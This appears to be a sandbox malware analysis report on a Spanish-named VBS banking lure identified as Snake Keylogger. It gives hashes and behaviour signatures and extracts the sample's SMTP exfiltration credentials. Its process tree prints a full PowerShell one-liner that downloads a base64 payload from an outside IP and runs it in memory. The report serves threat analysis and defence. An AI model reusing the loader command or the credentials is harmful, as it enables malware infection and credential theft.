Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
79s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
13/09/2022, 04:33
Static task
static1
Behavioral task
behavioral1
Sample
Transferencia_Datos bancarios.vbs
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Transferencia_Datos bancarios.vbs
Resource
win10v2004-20220812-en
General
-
Target
Transferencia_Datos bancarios.vbs
-
Size
433KB
-
MD5
e5c789225ef05bb4cf08ba2256550e7a
-
SHA1
e539d74166c70a2111409b82a5d735007e1ceed3
-
SHA256
5d4c7f07cb9896d740a7c174f63426f112952c95f12c6ab3a95f2e097e962518
-
SHA512
56bf329a93529f760f9fe4cf821397580288865eb61fa914f26276f01463ea90d9db8775004c9cce30d3acdc5628b5eea0dedcb7c6ea2195d29deae32f5d72cd
-
SSDEEP
48:yGoGjDfRzToTcjZR+EVrIoUgOiAwH0AuBQ/toTqKr:loGPfV//+uIoUgy5xBr
Malware Config
Extracted
http://20.7.14.99/bug/dll_nostartup.mp4
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.keefort.com.ec - Port:
587 - Username:
[email protected] - Password:
icui4cu2@@ - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
resource yara_rule behavioral2/memory/428-135-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral2/memory/428-136-0x000000000042020E-mapping.dmp family_snakekeylogger -
Blocklisted process makes network request 4 IoCs
flow pid Process 14 3760 powershell.exe 29 3760 powershell.exe 34 3760 powershell.exe 39 3760 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation WScript.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 43 checkip.dyndns.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3760 set thread context of 428 3760 powershell.exe 90 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 3760 powershell.exe 3760 powershell.exe 428 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3760 powershell.exe Token: SeDebugPrivilege 428 RegAsm.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 5016 wrote to memory of 3760 5016 WScript.exe 83 PID 5016 wrote to memory of 3760 5016 WScript.exe 83 PID 3760 wrote to memory of 428 3760 powershell.exe 90 PID 3760 wrote to memory of 428 3760 powershell.exe 90 PID 3760 wrote to memory of 428 3760 powershell.exe 90 PID 3760 wrote to memory of 428 3760 powershell.exe 90 PID 3760 wrote to memory of 428 3760 powershell.exe 90 PID 3760 wrote to memory of 428 3760 powershell.exe 90 PID 3760 wrote to memory of 428 3760 powershell.exe 90 PID 3760 wrote to memory of 428 3760 powershell.exe 90 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Transferencia_Datos bancarios.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/bug/dll_nostartup.mp4'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fvdsjafndsbfvxsfbndsdvbnnv/42.021.871.591//:ptth'))2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:428
-
-